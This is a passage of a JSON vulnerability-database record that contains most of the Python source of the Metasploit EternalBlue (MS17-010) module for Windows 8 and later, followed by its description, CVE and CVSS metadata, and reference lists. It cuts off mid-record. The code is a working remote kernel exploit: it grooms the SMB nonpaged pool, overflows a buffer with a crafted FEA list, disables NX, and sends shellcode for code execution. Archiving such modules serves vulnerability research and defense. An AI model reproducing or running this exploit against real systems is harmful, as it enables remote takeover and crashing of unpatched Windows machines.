+= pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180) # shellcode address\n\n\ndef getNTStatus(self):\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\nif not dependencies_missing:\n setattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\n\ndef sendEcho(conn, tid, data):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\n transCommand['Data'] = smb.SMBEcho_Data()\n\n transCommand['Parameters']['EchoCount'] = 1\n transCommand['Data']['Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('got good ECHO response')\n else:\n module.log('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n\n\n# override SMB.neg_session() to allow forcing ntlm authentication\nif not dependencies_missing:\n class MYSMB(smb.SMB):\n def __init__(self, remote_host, port, use_ntlmv2=True):\n self.__use_ntlmv2 = use_ntlmv2\n smb.SMB.__init__(self, remote_host, remote_host, sess_port = port)\n\n def neg_session(self, extended_security = True, negPacket = None):\n smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)\n\ndef createSessionAllocNonPaged(target, port, size, username, password):\n conn = MYSMB(target, port, use_ntlmv2=False) # with this negotiation, FLAGS2_EXTENDED_SECURITY is not set\n _, flags2 = conn.get_flags()\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\n if size >= 0xffff:\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n else:\n flags2 |= smb.SMB.FLAGS2_UNICODE\n reqSize = size\n conn.set_flags(flags2=flags2)\n\n pkt = smb.NewSMBPacket()\n\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\n sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()\n\n sessionSetup['Parameters']['MaxBufferSize'] = 61440 # can be any value greater than response size\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\n sessionSetup['Parameters']['VcNumber'] = 2 # any non-zero\n sessionSetup['Parameters']['SessionKey'] = 0\n sessionSetup['Parameters']['SecurityBlobLength'] = 0 # this is OEMPasswordLen field in another format. 0 for NULL session\n sessionSetup['Parameters']['Capabilities'] = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS\n\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n if username:\n # Try login with valid user because anonymous user might get access denied on Windows Server 2012.\n # Note: If target allows only NTLMv2 authentication, the login will always fail.\n # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\n reqSize = size // 2\n conn.set_flags(flags2=flags2)\n\n # new SMB packet to reset flags\n pkt = smb.NewSMBPacket()\n pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))\n # UnicodePasswordLen field is in Reserved for extended security format.\n sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)\n sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\\x00'*16\n pkt.addCommand(sessionSetup)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB()\n if recvPkt.getNTStatus() == 0:\n module.log('SMB1 session setup allocate nonpaged pool success')\n return conn\n\n # lazy to check error code, just print fail message\n module.log('SMB1 session setup allocate nonpaged pool failed', 'error')\n sys.exit(1)\n\n\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\nif not dependencies_missing:\n class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\n structure = (\n ('TotalParameterCount', '<H=0'),\n ('TotalDataCount', '<H'),\n ('ParameterCount', '<H=0'),\n ('ParameterOffset', '<H=0'),\n ('ParameterDisplacement', '<H=0'),\n ('DataCount', '<H'),\n ('DataOffset', '<H'),\n ('DataDisplacement', '<H=0'),\n ('FID', '<H=0'),\n )\n\ndef send_trans2_second(conn, tid, data, displacement):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n # assume no params\n\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\n\n transCommand['Parameters']['TotalParameterCount'] = 0\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+18\n transCommand['Data']['Pad1'] = ''\n\n transCommand['Parameters']['ParameterCount'] = 0\n transCommand['Parameters']['ParameterOffset'] = 0\n\n if len(data) > 0:\n pad2Len = (4 - fixedOffset % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = len(data)\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\n transCommand['Parameters']['DataDisplacement'] = displacement\n\n transCommand['Data']['Trans_Parameters'] = ''\n transCommand['Data']['Trans_Data'] = data\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n\n\ndef send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\n pkt = smb.NewSMBPacket()\n pkt['Tid'] = tid\n\n command = pack('<H', setup)\n\n # Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\n transCommand['Parameters']['MaxSetupCount'] = 1\n transCommand['Parameters']['MaxParameterCount'] = len(param)\n transCommand['Parameters']['MaxDataCount'] = 0\n transCommand['Data'] = smb.SMBTransaction2_Data()\n\n transCommand['Parameters']['Setup'] = command\n transCommand['Parameters']['TotalParameterCount'] = len(param)\n transCommand['Parameters']['TotalDataCount'] = len(data)\n\n fixedOffset = 32+3+38 + len(command)\n if len(param) > 0:\n padLen = (4 - fixedOffset % 4 ) % 4\n padBytes = '\\xFF' * padLen\n transCommand['Data']['Pad1'] = padBytes\n else:\n transCommand['Data']['Pad1'] = ''\n padLen = 0\n\n transCommand['Parameters']['ParameterCount'] = len(param)\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\n\n if len(data) > 0:\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\n else:\n transCommand['Data']['Pad2'] = ''\n pad2Len = 0\n\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\n\n transCommand['Data']['Trans_Parameters'] = param\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\n pkt.addCommand(transCommand)\n\n conn.sendSMB(pkt)\n recvPkt = conn.recvSMB() # must be success\n if recvPkt.getNTStatus() == 0:\n module.log('got good NT Trans response')\n else:\n module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')\n sys.exit(1)\n\n # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data\n i = firstDataFragmentSize\n while i < len(data):\n sendSize = min(4096, len(data) - i)\n if len(data) - i <= 4096:\n if not sendLastChunk:\n break\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\n i += sendSize\n\n if sendLastChunk:\n conn.recvSMB()\n return i\n\n\n# connect to target and send a large nbss size with data 0x80 bytes\n# this method is for allocating big nonpaged pool on target\ndef createConnectionWithBigSMBFirst80(target, port, for_nx=False):\n sk = socket.create_connection((target, port))\n pkt = '\\x00' + '\\x00' + pack('>H', 0x8100)\n # There is no need to be SMB2 because we want the target free the corrupted buffer.\n # Also this is invalid SMB2 message.\n # I believe NSA exploit use SMB2 for hiding alert from IDS\n #pkt += '\\xfeSMB' # smb2\n # it can be anything even it is invalid\n pkt += 'BAAD' # can be any\n if for_nx:\n # MUST set no delay because 1 byte MUST be sent immediately\n sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n pkt += '\\x00'*0x7b # another byte will be sent later to disabling NX\n else:\n pkt += '\\x00'*0x7c\n sk.send(pkt)\n return sk\n\n\ndef _exploit(target, port, feaList, shellcode, numGroomConn, username, password):\n # force using smb.SMB for SMB1\n conn = smb.SMB(target, target, sess_port = port)\n conn.login(username, password)\n server_os = conn.get_server_os()\n module.log('Target OS: '+server_os)\n if server_os.startswith(\"Windows 10 \"):\n build = int(server_os.split()[-1])\n if build >= 14393: # version 1607\n module.log('This exploit does not support this build: {} >= 14393'.format(build), 'error')\n sys.exit(1)\n elif not (server_os.startswith(\"Windows 8\") or server_os.startswith(\"Windows Server 2012 \")):\n module.log('This exploit does not support this target: {}'.format(server_os), 'error')\n sys.exit(1)\n\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n\n # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.\n # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment\n progress = send_big_trans2(conn, tid, 0, feaList, '\\x00'*30, len(feaList)%4096, False)\n\n # Another TRANS2_OPEN2 (0) with special feaList for disabling NX\n nxconn = smb.SMB(target, target, sess_port = port)\n nxconn.login(username, password)\n nxtid = nxconn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\n nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\\x00'*30, len(feaList)%4096, False)\n\n # create some big buffer at server\n # this buffer MUST NOT be big enough for overflown buffer\n allocConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE - 0x2010, username, password)\n\n # groom nonpaged pool\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\n srvnetConn = []\n for i in range(numGroomConn):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # create buffer size NTFEA_SIZE at server\n # this buffer will be replaced by overflown buffer\n holeConn = createSessionAllocNonPaged(target, port, NTFEA_SIZE-0x10, username, password)\n # disconnect allocConn to free buffer\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\n allocConn.get_socket().close()\n\n # hope one of srvnetConn is next to holeConn\n for i in range(5):\n sk = createConnectionWithBigSMBFirst80(target, port, for_nx=True)\n srvnetConn.append(sk)\n\n # remove holeConn to create hole for fea buffer\n holeConn.get_socket().close()\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # first trigger, overwrite srvnet buffer struct for disabling NX\n send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)\n recvPkt = nxconn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status for nx: INVALID_PARAMETER')\n else:\n module.log('bad response status for nx: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # send '\\x00' to disable nx\n for sk in srvnetConn:\n sk.send('\\x00')\n\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\n # second trigger, place fake struct and shellcode\n send_trans2_second(conn, tid, feaList[progress:], progress)\n recvPkt = conn.recvSMB()\n retStatus = recvPkt.getNTStatus()\n if retStatus == 0xc000000d:\n module.log('good response status: INVALID_PARAMETER')\n else:\n module.log('bad response status: 0x{:08x}'.format(retStatus), 'error')\n\n # one of srvnetConn struct header should be modified\n # a corrupted buffer will write recv data in designed memory address\n for sk in srvnetConn:\n sk.send(fake_recv_struct + shellcode)\n\n # execute shellcode\n for sk in srvnetConn:\n sk.close()\n\n # nicely close connection (no need for exploit)\n nxconn.disconnect_tree(tid)\n nxconn.logoff()\n nxconn.get_socket().close()\n conn.disconnect_tree(tid)\n conn.logoff()\n conn.get_socket().close()\n\n\ndef exploit(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket) missing, cannot continue', 'error')\n sys.exit(1)\n\n # XXX: Normalize strings to ints and unset options to empty strings\n rport = int(args['RPORT'])\n numGroomConn = int(args['GroomAllocations'])\n smbuser = args['SMBUser'] if 'SMBUser' in args else ''\n smbpass = args['SMBPass'] if 'SMBPass' in args else ''\n\n # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload\n sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])\n\n if len(sc) > 0xe80:\n module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')\n sys.exit(1)\n\n # Now, shellcode is known. create a feaList\n feaList = createFeaList(len(sc))\n\n module.log('shellcode size: {:d}'.format(len(sc)))\n module.log('numGroomConn: {:d}'.format(numGroomConn))\n\n try:\n _exploit(args['RHOST'], rport, feaList, sc, numGroomConn, smbuser, smbpass)\n # XXX: Catch everything until we know better\n except Exception as e:\n module.log(str(e), 'error')\n sys.exit(1)\n\n module.log('done')\n\n\nif __name__ == '__main__':\n module.run(metadata, exploit)\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 49}, "differentElements": ["published", "modified"], "edition": 43, "lastseen": "2020-01-12T02:00:54"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-03-21T18:43:42", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-21T18:43:42", "value": 7.3, "vector": "NONE"}}, "hash": "f25f6250688bcfa885a6da7e950069c6", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-03-21T18:43:42", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-11-02T02:20:22", "objectVersion": "1.4", "published": "2018-06-15T18:36:54", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 68}, "differentElements": ["sourceData"], "edition": 83, "lastseen": "2020-03-21T18:43:42"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-03-25T08:38:40", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": 